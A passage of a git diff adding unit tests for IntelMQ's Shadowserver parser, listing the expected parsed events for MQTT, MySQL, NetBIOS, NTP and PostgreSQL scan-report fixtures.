+                                     EXAMPLE_LINES[2]])),
+   'source.asn' : 24940,
+   'source.geolocation.cc' : 'DE',
+   'source.geolocation.city' : 'WERNIGERODE',
+   'source.geolocation.region' : 'SACHSEN-ANHALT',
+   'source.ip' : '144.76.0.0',
+   'source.port' : 8883,
+   'time.observation' : '2022-01-07T00:00:00+00:00',
+   'time.source' : '2022-01-10T00:59:34+00:00'
+},
+{
+   '__type' : 'Event',
+   'classification.identifier' : 'open-mqtt-anon',
+   'classification.taxonomy' : 'vulnerable',
+   'classification.type' : 'vulnerable-system',
+   'extra.cert_expiration_date' : '2030-08-05 16:51:57',
+   'extra.cert_issue_date' : '2020-08-07 16:51:57',
+   'extra.cert_length' : 2048,
+   'extra.cert_serial_number' : 'A71541EFAE529B03',
+   'extra.cipher_suite' : 'TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA',
+   'extra.code' : 'Connection Accepted',
+   'extra.hex_code' : '00',
+   'extra.issuer_common_name' : 'ClearView2Dev',
+   'extra.issuer_organization_name' : 'Sohonet',
+   'extra.issuer_organization_unit_name' : 'ClearView2Dev',
+   'extra.key_algorithm' : 'rsaEncryption',
+   'extra.md5_fingerprint' : '43:0D:A7:89:9E:76:8D:6E:D5:AD:95:CC:F2:91:87:56',
+   'extra.raw_response' : '20020000',
+   'extra.sha1_fingerprint' : '32:4B:66:98:FA:5B:D2:D1:F2:53:83:21:19:11:5A:A9:BE:85:56:16',
+   'extra.sha256_fingerprint' : 'AE:0D:65:34:2F:51:F7:32:1E:DF:B1:DA:12:C7:6A:DE:42:B5:4B:FF:80:2C:E5:EF:99:F6:CC:01:4B:C9:77:68',
+   'extra.sha512_fingerprint' : '44:C4:B8:19:FA:39:55:51:EC:E4:6D:C4:6D:0F:A5:46:BB:D5:F9:FD:A6:8D:DF:F3:2D:D2:92:6C:0B:D5:D3:25:CB:19:50:9D:A6:A4:D4:D3:2E:53:10:F5:8D:77:F7:90:F8:65:A7:79:AB:14:62:72:01:F3:EA:38:E2:68:C7:25',
+   'extra.signature_algorithm' : 'sha256WithRSAEncryption',
+   'extra.ssl_version' : 0,
+   'extra.subject_common_name' : 'foo.example.com',
+   'extra.subject_locality_name' : '<',
+   'extra.subject_organization_name' : 'Sohonet',
+   'extra.tag' : 'mqtt,mqtt-anon',
+   'feed.name' : 'Open Anonymous MQTT',
+   'protocol.application' : 'mqtt',
+   'protocol.transport' : 'tcp',
+   'raw': utils.base64_encode('\n'.join([EXAMPLE_LINES[0],
+                                     EXAMPLE_LINES[3]])),
+   'source.asn' : 5555,
+   'source.geolocation.cc' : 'US',
+   'source.geolocation.city' : 'BURBANK',
+   'source.geolocation.region' : 'CALIFORNIA',
+   'source.ip' : '173.0.0.0',
+   'source.port' : 8883,
+   'source.reverse_dns' : 'example.com',
+   'time.observation' : '2022-01-07T00:00:00+00:00',
+   'time.source' : '2022-01-10T00:59:34+00:00'
+}
+]
+
+
+class TestShadowserverParserBot(test.BotTestCase, unittest.TestCase):
+    """
+    A TestCase for a ShadowserverParserBot.
+    """
+
+    @classmethod
+    def set_bot(cls):
+        cls.bot_reference = ShadowserverParserBot
+        cls.default_input_message = EXAMPLE_REPORT
+
+    def test_event(self):
+        """ Test if correct Event has been produced. """
+        self.run_bot()
+        for i, EVENT in enumerate(EVENTS):
+            self.assertMessageEqual(i, EVENT)
+
+
+if __name__ == '__main__':  # pragma: no cover
+    unittest.main()
diff --git a/intelmq/tests/bots/parsers/shadowserver/test_scan_mysql.py b/intelmq/tests/bots/parsers/shadowserver/test_scan_mysql.py
new file mode 100644
index 000000000..3e008f950
--- /dev/null
+++ b/intelmq/tests/bots/parsers/shadowserver/test_scan_mysql.py
@@ -0,0 +1,258 @@
+# SPDX-FileCopyrightText: 2022 Shadowserver Foundation
+#
+# SPDX-License-Identifier: AGPL-3.0-or-later
+
+# -*- coding: utf-8 -*-
+
+import os
+import unittest
+
+import intelmq.lib.test as test
+import intelmq.lib.utils as utils
+from intelmq.bots.parsers.shadowserver.parser import ShadowserverParserBot
+
+with open(os.path.join(os.path.dirname(__file__),
+                       'testdata/scan_mysql.csv')) as handle:
+    EXAMPLE_FILE = handle.read()
+EXAMPLE_LINES = EXAMPLE_FILE.splitlines()
+
+EXAMPLE_REPORT = {'feed.name': 'Accessible MySQL Server',
+                  "raw": utils.base64_encode(EXAMPLE_FILE),
+                  "__type": "Report",
+                  "time.observation": "2010-02-10T00:00:00+00:00",
+                  "extra.file_name": "2010-02-10-scan_mysql-test.csv",
+                  }
+EVENTS = [
+        {
+   '__type' : 'Event',
+   'classification.identifier' : 'open-mysql',
+   'classification.taxonomy' : 'other',
+   'classification.type' : 'other',
+   'extra.browser_error' : 'x509: failed to load system roots and no roots provided',
+   'extra.cert_expiration_date' : '2021-11-12 11:18:27',
+   'extra.cert_expired' : True,
+   'extra.cert_issue_date' : '2012-11-14 11:18:27',
+   'extra.cert_length' : 2048,
+   'extra.cert_serial_number' : 'B3F13DFBDBA2D8B2',
+   'extra.cert_valid' : False,
+   'extra.cipher_suite' : 'TLS_AES_256_GCM_SHA384',
+   'extra.client_can_handle_expired_passwords' : True,
+   'extra.client_compress' : True,
+   'extra.client_connect_attrs' : True,
+   'extra.client_connect_with_db' : True,
+   'extra.client_deprecated_eof' : True,
+   'extra.client_found_rows' : True,
+   'extra.client_ignore_sigpipe' : True,
+   'extra.client_ignore_space' : True,
+   'extra.client_interactive' : True,
+   'extra.client_local_files' : True,
+   'extra.client_long_flag' : True,
+   'extra.client_long_password' : True,
+   'extra.client_multi_results' : True,
+   'extra.client_multi_statements' : True,
+   'extra.client_no_schema' : True,
+   'extra.client_odbc' : True,
+   'extra.client_plugin_auth' : True,
+   'extra.client_plugin_auth_len_enc_client_data' : True,
+   'extra.client_protocol_41' : True,
+   'extra.client_ps_multi_results' : True,
+   'extra.client_reserved' : True,
+   'extra.client_secure_connection' : True,
+   'extra.client_session_track' : False,
+   'extra.client_ssl' : False,
+   'extra.client_transactions' : False,
+   'extra.error_code' : '1',
+   'extra.error_id' : '1',
+   'extra.error_message' : '1',
+   'extra.handshake' : 'TLSv1.2',
+   'extra.issuer_common_name' : 'example.com',
+   'extra.key_algorithm' : 'rsaEncryption',
+   'extra.md5_fingerprint' : 'F1:8A:02:48:3C:6B:F4:00:CC:5C:D5:B0:71:E4:FA:00',
+   'extra.mysql_protocol_version' : '10',
+   'extra.server_version' : '5.7.37-0ubuntu0.18.04.1',
+   'extra.sha1_fingerprint' : '03:39:9E:5D:77:19:38:C4:49:DE:C3:3D:9B:E6:13:ED:5A:F1:42:55',
+   'extra.sha256_fingerprint' : 'E1:D1:6E:87:49:B9:AC:74:B4:AC:9B:77:85:27:69:97:0D:16:B1:F6:63:F0:26:51:AA:89:42:39:66:BD:47:D0',
+   'extra.sha512_fingerprint' : '1C:E9:04:22:90:46:68:0B:8B:54:33:38:C6:20:5F:EE:A6:73:A6:B5:2C:7D:12:94:DE:F1:CC:11:2E:72:0B:97:C2:7D:19:BF:E0:6B:98:A9:21:D9:9D:5A:CB:38:0B:D8:7E:E2:8E:2B:EA:15:EC:60:11:1E:41:E3:FB:4C:20:9F',
+   'extra.signature_algorithm' : 'sha256WithRSAEncryption',
+   'extra.source.sector' : 'Communications, Service Provider, and Hosting Service',
+   'extra.ssl_version' : 2,
+   'extra.subject_common_name' : 'example.com',
+   'extra.subject_country' : 'US',
+   'extra.tag' : 'mysql',
+   'feed.name' : 'Accessible MySQL Server',
+   'protocol.application' : 'mysql',
+   'protocol.transport' : 'tcp',
+   'raw' : utils.base64_encode('\n'.join([EXAMPLE_LINES[0], EXAMPLE_LINES[1]])),
+   'source.asn' : 64512,
+   'source.geolocation.cc' : 'ZZ',
+   'source.geolocation.city' : 'City',
+   'source.geolocation.region' : 'Region',
+   'source.ip' : '192.168.0.1',
+   'source.port' : 3306,
+   'source.reverse_dns' : 'node01.example.com',
+   'time.observation' : '2010-02-10T00:00:00+00:00',
+   'time.source' : '2010-02-10T00:00:00+00:00'
+},
+
+{
+   '__type' : 'Event',
+   'classification.identifier' : 'open-mysql',
+   'classification.taxonomy' : 'other',
+   'classification.type' : 'other',
+   'extra.browser_error' : 'x509: failed to load system roots and no roots provided',
+   'extra.cert_expiration_date' : '2021-11-12 11:18:27',
+   'extra.cert_expired' : True,
+   'extra.cert_issue_date' : '2012-11-14 11:18:27',
+   'extra.cert_length' : 2048,
+   'extra.cert_serial_number' : 'B3F13DFBDBA2D8B2',
+   'extra.cert_valid' : False,
+   'extra.cipher_suite' : 'TLS_AES_256_GCM_SHA384',
+   'extra.client_can_handle_expired_passwords' : True,
+   'extra.client_compress' : True,
+   'extra.client_connect_attrs' : True,
+   'extra.client_connect_with_db' : True,
+   'extra.client_deprecated_eof' : True,
+   'extra.client_found_rows' : True,
+   'extra.client_ignore_sigpipe' : True,
+   'extra.client_ignore_space' : True,
+   'extra.client_interactive' : True,
+   'extra.client_local_files' : True,
+   'extra.client_long_flag' : True,
+   'extra.client_long_password' : True,
+   'extra.client_multi_results' : True,
+   'extra.client_multi_statements' : True,
+   'extra.client_no_schema' : True,
+   'extra.client_odbc' : True,
+   'extra.client_plugin_auth' : True,
+   'extra.client_plugin_auth_len_enc_client_data' : True,
+   'extra.client_protocol_41' : True,
+   'extra.client_ps_multi_results' : True,
+   'extra.client_reserved' : True,
+   'extra.client_secure_connection' : True,
+   'extra.client_session_track' : False,
+   'extra.client_ssl' : False,
+   'extra.client_transactions' : False,
+   'extra.error_code' : '1',
+   'extra.error_id' : '1',
+   'extra.error_message' : '1',
+   'extra.handshake' : 'TLSv1.2',
+   'extra.issuer_common_name' : 'example.com',
+   'extra.key_algorithm' : 'rsaEncryption',
+   'extra.md5_fingerprint' : 'F1:8A:02:48:3C:6B:F4:00:CC:5C:D5:B0:71:E4:FA:00',
+   'extra.mysql_protocol_version' : '10',
+   'extra.server_version' : '5.7.30-0ubuntu0.18.04.1-log',
+   'extra.sha1_fingerprint' : '03:39:9E:5D:77:19:38:C4:49:DE:C3:3D:9B:E6:13:ED:5A:F1:42:55',
+   'extra.sha256_fingerprint' : 'E1:D1:6E:87:49:B9:AC:74:B4:AC:9B:77:85:27:69:97:0D:16:B1:F6:63:F0:26:51:AA:89:42:39:66:BD:47:D0',
+   'extra.sha512_fingerprint' : '1C:E9:04:22:90:46:68:0B:8B:54:33:38:C6:20:5F:EE:A6:73:A6:B5:2C:7D:12:94:DE:F1:CC:11:2E:72:0B:97:C2:7D:19:BF:E0:6B:98:A9:21:D9:9D:5A:CB:38:0B:D8:7E:E2:8E:2B:EA:15:EC:60:11:1E:41:E3:FB:4C:20:9F',
+   'extra.signature_algorithm' : 'sha256WithRSAEncryption',
+   'extra.ssl_version' : 2,
+   'extra.subject_common_name' : 'example.com',
+   'extra.subject_country' : 'US',
+   'extra.tag' : 'mysql',
+   'feed.name' : 'Accessible MySQL Server',
+   'protocol.application' : 'mysql',
+   'protocol.transport' : 'tcp',
+   'raw' : utils.base64_encode('\n'.join([EXAMPLE_LINES[0], EXAMPLE_LINES[2]])),
+   'source.asn' : 64512,
+   'source.geolocation.cc' : 'ZZ',
+   'source.geolocation.city' : 'City',
+   'source.geolocation.region' : 'Region',
+   'source.ip' : '192.168.0.2',
+   'source.port' : 3306,
+   'source.reverse_dns' : 'node02.example.com',
+   'time.observation' : '2010-02-10T00:00:00+00:00',
+   'time.source' : '2010-02-10T00:00:01+00:00'
+},
+
+{
+   '__type' : 'Event',
+   'classification.identifier' : 'open-mysql',
+   'classification.taxonomy' : 'other',
+   'classification.type' : 'other',
+   'extra.browser_error' : 'x509: failed to load system roots and no roots provided',
+   'extra.cert_expiration_date' : '2021-11-12 11:18:27',
+   'extra.cert_expired' : True,
+   'extra.cert_issue_date' : '2012-11-14 11:18:27',
+   'extra.cert_length' : 2048,
+   'extra.cert_serial_number' : 'B3F13DFBDBA2D8B2',
+   'extra.cert_valid' : False,
+   'extra.cipher_suite' : 'TLS_AES_256_GCM_SHA384',
+   'extra.client_can_handle_expired_passwords' : True,
+   'extra.client_compress' : True,
+   'extra.client_connect_attrs' : True,
+   'extra.client_connect_with_db' : True,
+   'extra.client_deprecated_eof' : True,
+   'extra.client_found_rows' : True,
+   'extra.client_ignore_sigpipe' : True,
+   'extra.client_ignore_space' : True,
+   'extra.client_interactive' : True,
+   'extra.client_local_files' : True,
+   'extra.client_long_flag' : True,
+   'extra.client_long_password' : True,
+   'extra.client_multi_results' : True,
+   'extra.client_multi_statements' : True,
+   'extra.client_no_schema' : True,
+   'extra.client_odbc' : True,
+   'extra.client_plugin_auth' : True,
+   'extra.client_plugin_auth_len_enc_client_data' : True,
+   'extra.client_protocol_41' : True,
+   'extra.client_ps_multi_results' : True,
+   'extra.client_reserved' : True,
+   'extra.client_secure_connection' : True,
+   'extra.client_session_track' : False,
+   'extra.client_ssl' : False,
+   'extra.client_transactions' : False,
+   'extra.error_code' : '1',
+   'extra.error_id' : '1',
+   'extra.error_message' : '1',
+   'extra.handshake' : 'TLSv1.2',
+   'extra.issuer_common_name' : 'example.com',
+   'extra.key_algorithm' : 'rsaEncryption',
+   'extra.md5_fingerprint' : 'F1:8A:02:48:3C:6B:F4:00:CC:5C:D5:B0:71:E4:FA:00',
+   'extra.mysql_protocol_version' : '10',
+   'extra.server_version' : '8.0.23',
+   'extra.sha1_fingerprint' : '03:39:9E:5D:77:19:38:C4:49:DE:C3:3D:9B:E6:13:ED:5A:F1:42:55',
+   'extra.sha256_fingerprint' : 'E1:D1:6E:87:49:B9:AC:74:B4:AC:9B:77:85:27:69:97:0D:16:B1:F6:63:F0:26:51:AA:89:42:39:66:BD:47:D0',
+   'extra.sha512_fingerprint' : '1C:E9:04:22:90:46:68:0B:8B:54:33:38:C6:20:5F:EE:A6:73:A6:B5:2C:7D:12:94:DE:F1:CC:11:2E:72:0B:97:C2:7D:19:BF:E0:6B:98:A9:21:D9:9D:5A:CB:38:0B:D8:7E:E2:8E:2B:EA:15:EC:60:11:1E:41:E3:FB:4C:20:9F',
+   'extra.signature_algorithm' : 'sha256WithRSAEncryption',
+   'extra.source.sector' : 'Retail Trade',
+   'extra.ssl_version' : 2,
+   'extra.subject_common_name' : 'example.com',
+   'extra.subject_country' : 'US',
+   'extra.tag' : 'mysql',
+   'feed.name' : 'Accessible MySQL Server',
+   'protocol.application' : 'mysql',
+   'protocol.transport' : 'tcp',
+   'raw' : utils.base64_encode('\n'.join([EXAMPLE_LINES[0], EXAMPLE_LINES[3]])),
+   'source.asn' : 64512,
+   'source.geolocation.cc' : 'ZZ',
+   'source.geolocation.city' : 'City',
+   'source.geolocation.region' : 'Region',
+   'source.ip' : '192.168.0.3',
+   'source.port' : 3306,
+   'source.reverse_dns' : 'node03.example.com',
+   'time.observation' : '2010-02-10T00:00:00+00:00',
+   'time.source' : '2010-02-10T00:00:02+00:00'
+}
+]
+
+
+class TestShadowserverParserBot(test.BotTestCase, unittest.TestCase):
+    """
+    A TestCase for a ShadowserverParserBot.
+    """
+
+    @classmethod
+    def set_bot(cls):
+        cls.bot_reference = ShadowserverParserBot
+        cls.default_input_message = EXAMPLE_REPORT
+
+    def test_event(self):
+        """ Test if correct Event has been produced. """
+        self.run_bot()
+        for i, EVENT in enumerate(EVENTS):
+            self.assertMessageEqual(i, EVENT)
+
+
+if __name__ == '__main__':  # pragma: no cover
+    unittest.main()
diff --git a/intelmq/tests/bots/parsers/shadowserver/test_scan_netbios.py b/intelmq/tests/bots/parsers/shadowserver/test_scan_netbios.py
new file mode 100644
index 000000000..d10dc552e
--- /dev/null
+++ b/intelmq/tests/bots/parsers/shadowserver/test_scan_netbios.py
@@ -0,0 +1,123 @@
+# SPDX-FileCopyrightText: 2022 Shadowserver Foundation
+#
+# SPDX-License-Identifier: AGPL-3.0-or-later
+
+# -*- coding: utf-8 -*-
+
+import os
+import unittest
+
+import intelmq.lib.test as test
+import intelmq.lib.utils as utils
+from intelmq.bots.parsers.shadowserver.parser import ShadowserverParserBot
+
+with open(os.path.join(os.path.dirname(__file__),
+                       'testdata/scan_netbios.csv')) as handle:
+    EXAMPLE_FILE = handle.read()
+EXAMPLE_LINES = EXAMPLE_FILE.splitlines()
+
+EXAMPLE_REPORT = {'feed.name': 'Netbios',
+                  "raw": utils.base64_encode(EXAMPLE_FILE),
+                  "__type": "Report",
+                  "time.observation": "2022-01-07T00:00:00+00:00",
+                  "extra.file_name": "2022-01-07-scan_netbios-test.csv",
+                  }
+EVENTS = [
+{
+   '__type' : 'Event',
+   'classification.identifier' : 'open-netbios-nameservice',
+   'classification.taxonomy' : 'vulnerable',
+   'classification.type' : 'vulnerable-system',
+   'extra.mac_address' : '00-00-00-00-00-00',
+   'extra.machine_name' : 'EXAMPLEMACHINE',
+   'extra.naics' : 541690,
+   'extra.sic' : 874899,
+   'extra.tag' : 'netbios',
+   'source.account' : 'DEV',
+   'extra.workgroup' : 'ARBEITSGRUPPE',
+   'feed.name' : 'Netbios',
+   'protocol.application' : 'netbios-nameservice',
+   'protocol.transport' : 'udp',
+   'raw': utils.base64_encode('\n'.join([EXAMPLE_LINES[0],
+                                     EXAMPLE_LINES[1]])),
+   'source.asn' : 3320,
+   'source.geolocation.cc' : 'DE',
+   'source.geolocation.city' : 'SINDELFINGEN',
+   'source.geolocation.region' : 'BADEN-WURTTEMBERG',
+   'source.ip' : '198.51.100.4',
+   'source.port' : 137,
+   'source.reverse_dns' : '198-51-100-4.example.net',
+   'time.observation' : '2022-01-07T00:00:00+00:00',
+   'time.source' : '2016-07-24T00:10:50+00:00'
+},
+{
+   '__type' : 'Event',
+   'classification.identifier' : 'open-netbios-nameservice',
+   'classification.taxonomy' : 'vulnerable',
+   'classification.type' : 'vulnerable-system',
+   'extra.mac_address' : '00-1B-C6-41-35-F5',
+   'extra.machine_name' : 'EXAMPLEMACHINE',
+   'extra.tag' : 'netbios',
+   'extra.workgroup' : 'STRATOSERVER',
+   'feed.name' : 'Netbios',
+   'protocol.application' : 'netbios-nameservice',
+   'protocol.transport' : 'udp',
+   'raw': utils.base64_encode('\n'.join([EXAMPLE_LINES[0],
+                                     EXAMPLE_LINES[2]])),
+   'source.asn' : 6724,
+   'source.geolocation.cc' : 'DE',
+   'source.geolocation.city' : 'BERLIN',
+   'source.geolocation.region' : 'BERLIN',
+   'source.ip' : '198.51.100.182',
+   'source.port' : 137,
+   'source.reverse_dns' : '198-51-100-182.example.net',
+   'time.observation' : '2022-01-07T00:00:00+00:00',
+   'time.source' : '2016-07-24T00:10:50+00:00'
+},
+{
+   '__type' : 'Event',
+   'classification.identifier' : 'open-netbios-nameservice',
+   'classification.taxonomy' : 'vulnerable',
+   'classification.type' : 'vulnerable-system',
+   'extra.mac_address' : '00-00-00-00-00-00',
+   'extra.machine_name' : 'EXAMPLEMACHINE',
+   'extra.tag' : 'netbios',
+   'source.account' : 'DEV',
+   'extra.workgroup' : 'WORKGROUP',
+   'feed.name' : 'Netbios',
+   'protocol.application' : 'netbios-nameservice',
+   'protocol.transport' : 'udp',
+   'raw': utils.base64_encode('\n'.join([EXAMPLE_LINES[0],
+                                     EXAMPLE_LINES[3]])),
+   'source.asn' : 24940,
+   'source.geolocation.cc' : 'DE',
+   'source.geolocation.city' : 'GUNZENHAUSEN',
+   'source.geolocation.region' : 'BAYERN',
+   'source.ip' : '198.51.100.176',
+   'source.port' : 137,
+   'source.reverse_dns' : '198-51-100-221.example.net',
+   'time.observation' : '2022-01-07T00:00:00+00:00',
+   'time.source' : '2016-07-24T00:10:50+00:00'
+}
+]
+
+
+class TestShadowserverParserBot(test.BotTestCase, unittest.TestCase):
+    """
+    A TestCase for a ShadowserverParserBot.
+    """
+
+    @classmethod
+    def set_bot(cls):
+        cls.bot_reference = ShadowserverParserBot
+        cls.default_input_message = EXAMPLE_REPORT
+
+    def test_event(self):
+        """ Test if correct Event has been produced. """
+        self.run_bot()
+        for i, EVENT in enumerate(EVENTS):
+            self.assertMessageEqual(i, EVENT)
+
+
+if __name__ == '__main__':  # pragma: no cover
+    unittest.main()
diff --git a/intelmq/tests/bots/parsers/shadowserver/test_netis_router.py b/intelmq/tests/bots/parsers/shadowserver/test_scan_netis_router.py
similarity index 91%
rename from intelmq/tests/bots/parsers/shadowserver/test_netis_router.py
rename to intelmq/tests/bots/parsers/shadowserver/test_scan_netis_router.py
index 57060a30c..d244bec47 100644
--- a/intelmq/tests/bots/parsers/shadowserver/test_netis_router.py
+++ b/intelmq/tests/bots/parsers/shadowserver/test_scan_netis_router.py
@@ -10,14 +10,14 @@
 import intelmq.lib.utils as utils
 from intelmq.bots.parsers.shadowserver.parser import ShadowserverParserBot
 
-with open(os.path.join(os.path.dirname(__file__), 'testdata/netis_router.csv')) as handle:
+with open(os.path.join(os.path.dirname(__file__), 'testdata/scan_netis_router.csv')) as handle:
     EXAMPLE_FILE = handle.read()
 EXAMPLE_LINES = EXAMPLE_FILE.splitlines()
 
 EXAMPLE_REPORT = {"raw": utils.base64_encode(EXAMPLE_FILE),
                   "__type": "Report",
                   "time.observation": "2015-01-01T00:00:00+00:00",
-                  "extra.file_name": "2019-01-01-netis_router-test-geo.csv",
+                  "extra.file_name": "2019-01-01-scan_netis_router-test-geo.csv",
                   }
 EVENTS = [{'__type': 'Event',
            'classification.identifier': 'open-netis',
diff --git a/intelmq/tests/bots/parsers/shadowserver/test_scan_ntp.py b/intelmq/tests/bots/parsers/shadowserver/test_scan_ntp.py
index 20f52d704..1df65a226 100644
--- a/intelmq/tests/bots/parsers/shadowserver/test_scan_ntp.py
+++ b/intelmq/tests/bots/parsers/shadowserver/test_scan_ntp.py
@@ -21,74 +21,120 @@
                   "time.observation": "2015-01-01T00:00:00+00:00",
                   "extra.file_name": "2019-01-01-scan_ntp-test-geo.csv",
                   }
-EVENTS = [{'__type': 'Event',
-           'feed.name': 'NTP Version',
-           "classification.identifier": "ntp-version",
-           "classification.taxonomy": "vulnerable",
-           "classification.type": "vulnerable-system",
-           "extra.clk_wander": 0.0,
-           "extra.clock": "0xE1198EEB.21E18AD4",
-           "extra.frequency": 0.0,
-           "extra.jitter": 0.0,
-           "extra.leap": 0,
-           "extra.mintc": "3",
-           "extra.naics": 517311,
-           "extra.offset": 0.0,
-           "extra.precision": -22,
-           "extra.refid": "198.123.245.4",
-           "extra.reftime": "0xE1198C78.D013546A",
-           "extra.rootdelay": 0.0,
-           "extra.rootdispersion": 0.0,
-           "extra.stratum": 2,
-           "extra.system": "UNIX",
-           "extra.tc": 7,
-           "extra.version": "4",
-           "protocol.application": "ntp",
-           "protocol.transport": "udp",
-           'raw': utils.base64_encode('\n'.join([EXAMPLE_LINES[0],
-                                                 EXAMPLE_LINES[1]])),
-           "source.asn": 5678,
-           "source.geolocation.cc": "AA",
-           "source.geolocation.city": "LOCATION",
-           "source.geolocation.region": "LOCATION",
-           "source.ip": "198.123.245.134",
-           "source.port": 123,
-           "source.reverse_dns": "example.local",
-           "time.observation": "2015-01-01T00:00:00+00:00",
-           "time.source": "2019-09-04T01:16:27+00:00"
-           },
-           {'__type': 'Event',
-           'feed.name': 'NTP Version',
-           "classification.identifier": "ntp-version",
-           "classification.taxonomy": "vulnerable",
-           "classification.type": "vulnerable-system",
-           "extra.clock": "0xE1198EEB.1675E416",
-           "extra.error": "0.06",
-           "extra.frequency": 153.78,
-           "extra.leap": 0,
-           "extra.naics": 517311,
-           "extra.peer": 62164,
-           "extra.poll": 6,
-           "extra.refid": "198.123.245.123",
-           "extra.reftime": "0xE1198EE2.84FFA639",
-           "extra.rootdelay": 2.24,
-           "extra.rootdispersion": 1.46,
-           "extra.stratum": 2,
-           "extra.system": "cisco",
-           "protocol.application": "ntp",
-           "protocol.transport": "udp",
-           'raw': utils.base64_encode('\n'.join([EXAMPLE_LINES[0],
-                                                 EXAMPLE_LINES[2]])),
-           "source.asn": 5678,
-           "source.geolocation.cc": "AA",
-           "source.geolocation.city": "LOCATION",
-           "source.geolocation.region": "LOCATION",
-           "source.ip": "198.123.245.51",
-           "source.port": 123,
-           "source.reverse_dns": "example.local",
-           "time.observation": "2015-01-01T00:00:00+00:00",
-           "time.source": "2019-09-04T01:16:27+00:00"
-           },
+EVENTS = [
+        {
+   '__type' : 'Event',
+   'classification.identifier' : 'ntp-version',
+   'classification.taxonomy' : 'vulnerable',
+   'classification.type' : 'vulnerable-system',
+   'extra.clk_wander' : 0,
+   'extra.clock' : '0xE62E08E9.F0A774D2',
+   'extra.frequency' : 0,
+   'extra.jitter' : 0,
+   'extra.leap' : 3,
+   'extra.mintc' : '3',
+   'extra.offset' : 0,
+   'extra.precision' : -20,
+   'extra.refid' : 'INIT',
+   'extra.reftime' : '0x00000000.00000000',
+   'extra.rootdelay' : 0,
+   'extra.rootdispersion' : 0,
+   'extra.stratum' : 16,
+   'extra.system' : 'UNIX',
+   'extra.tag' : 'ntpversion',
+   'extra.tc' : 3,
+   'extra.version' : '4',
+   'feed.name' : 'NTP Version',
+   'protocol.application' : 'ntp',
+   'protocol.transport' : 'udp',
+   'raw' : utils.base64_encode('\n'.join([EXAMPLE_LINES[0], EXAMPLE_LINES[1]])),
+   'source.asn' : 64512,
+   'source.geolocation.cc' : 'ZZ',
+   'source.geolocation.city' : 'City',
+   'source.geolocation.region' : 'Region',
+   'source.ip' : '192.168.0.1',
+   'source.port' : 123,
+   'source.reverse_dns' : 'node01.example.com',
+   'time.observation' : '2015-01-01T00:00:00+00:00',
+   'time.source' : '2010-02-10T00:00:00+00:00'
+},
+
+{
+   '__type' : 'Event',
+   'classification.identifier' : 'ntp-version',
+   'classification.taxonomy' : 'vulnerable',
+   'classification.type' : 'vulnerable-system',
+   'extra.clk_wander' : 2.64,
+   'extra.clock' : '0xe62e0cad.c2ff7c82',
+   'extra.frequency' : -11.962,
+   'extra.jitter' : 0,
+   'extra.leap' : 0,
+   'extra.mintc' : '3',
+   'extra.offset' : 12.719,
+   'extra.precision' : -18,
+   'extra.processor' : 'mips64',
+   'extra.refid' : '203.248.240.103',
+   'extra.reftime' : '0xe62e0be6.60888599',
+   'extra.rootdelay' : 6.493,
+   'extra.rootdispersion' : 1093.842,
+   'extra.stratum' : 3,
+   'extra.system' : 'Linux/2.6.38+',
+   'extra.tag' : 'ntpversion',
+   'extra.tc' : 10,
+   'extra.version' : 'ntpd 4.2.8p10@1.3728-o Sun Sep 17 20:40:05 UTC 2017 (1)',
+   'feed.name' : 'NTP Version',
+   'protocol.application' : 'ntp',
+   'protocol.transport' : 'udp',
+   'raw' : utils.base64_encode('\n'.join([EXAMPLE_LINES[0], EXAMPLE_LINES[2]])),
+   'source.asn' : 64512,
+   'source.geolocation.cc' : 'ZZ',
+   'source.geolocation.city' : 'City',
+   'source.geolocation.region' : 'Region',
+   'source.ip' : '192.168.0.2',
+   'source.port' : 123,
+   'source.reverse_dns' : 'node02.example.com',
+   'time.observation' : '2015-01-01T00:00:00+00:00',
+   'time.source' : '2010-02-10T00:00:01+00:00'
+},
+
+{
+   '__type' : 'Event',
+   'classification.identifier' : 'ntp-version',
+   'classification.taxonomy' : 'vulnerable',
+   'classification.type' : 'vulnerable-system',
+   'extra.clock' : '0xE62E0CAD.BCF46BB4',
+   'extra.frequency' : 46.122,
+   'extra.jitter' : 5.271,
+   'extra.leap' : 0,
+   'extra.noise' : '0.849',
+   'extra.offset' : 3.136,
+   'extra.poll' : 10,
+   'extra.precision' : -28,
+   'extra.refid' : '194.25.7.190',
+   'extra.reftime' : '0xE62E08C0.6967CAFB',
+   'extra.rootdelay' : 37.173,
+   'extra.rootdispersion' : 69.399,
+   'extra.sector' : 'Communications, Service Provider, and Hosting Service',
+   'extra.stability' : '0.028',
+   'extra.state' : '4',
+   'extra.stratum' : 3,
+   'extra.system' : 'UNIX',
+   'extra.tag' : 'ntpversion',
+   'extra.version' : '4',
+   'feed.name' : 'NTP Version',
+   'protocol.application' : 'ntp',
+   'protocol.transport' : 'udp',
+   'raw' : utils.base64_encode('\n'.join([EXAMPLE_LINES[0], EXAMPLE_LINES[3]])),
+   'source.asn' : 64512,
+   'source.geolocation.cc' : 'ZZ',
+   'source.geolocation.city' : 'City',
+   'source.geolocation.region' : 'Region',
+   'source.ip' : '192.168.0.3',
+   'source.port' : 123,
+   'source.reverse_dns' : 'node03.example.com',
+   'time.observation' : '2015-01-01T00:00:00+00:00',
+   'time.source' : '2010-02-10T00:00:02+00:00'
+}
           ]
 
 class TestShadowserverParserBot(test.BotTestCase, unittest.TestCase):
diff --git a/intelmq/tests/bots/parsers/shadowserver/test_scan_postgres.py b/intelmq/tests/bots/parsers/shadowserver/test_scan_postgres.py
new file mode 100644
index 000000000..43a297f78
--- /dev/null
+++ b/intelmq/tests/bots/parsers/shadowserver/test_scan_postgres.py
@@ -0,0 +1,199 @@
+# SPDX-FileCopyrightText: 2022 Shadowserver Foundation
+#
+# SPDX-License-Identifier: AGPL-3.0-or-later
+
+# -*- coding: utf-8 -*-
+
+import os
+import unittest
+
+import intelmq.lib.test as test
+import intelmq.lib.utils as utils
+from intelmq.bots.parsers.shadowserver.parser import ShadowserverParserBot
+
+with open(os.path.join(os.path.dirname(__file__),
+                       'testdata/scan_postgres.csv')) as handle:
+    EXAMPLE_FILE = handle.read()
+EXAMPLE_LINES = EXAMPLE_FILE.splitlines()
+
+EXAMPLE_REPORT = {'feed.name': 'Accessible-PostgreSQL',
+                  "raw": utils.base64_encode(EXAMPLE_FILE),
+                  "__type": "Report",
+                  "time.observation": "2010-02-10T00:00:00+00:00",
+                  "extra.file_name": "2010-02-10-scan_postgres-test.csv",
+                  }
+EVENTS = [
+{
+   '__type' : 'Event',
+   'classification.identifier' : 'open-postgres',
+   'classification.taxonomy' : 'other',
+   'classification.type' : 'other',
+   'extra.cert_expiration_date' : '2021-11-12 11:18:27',
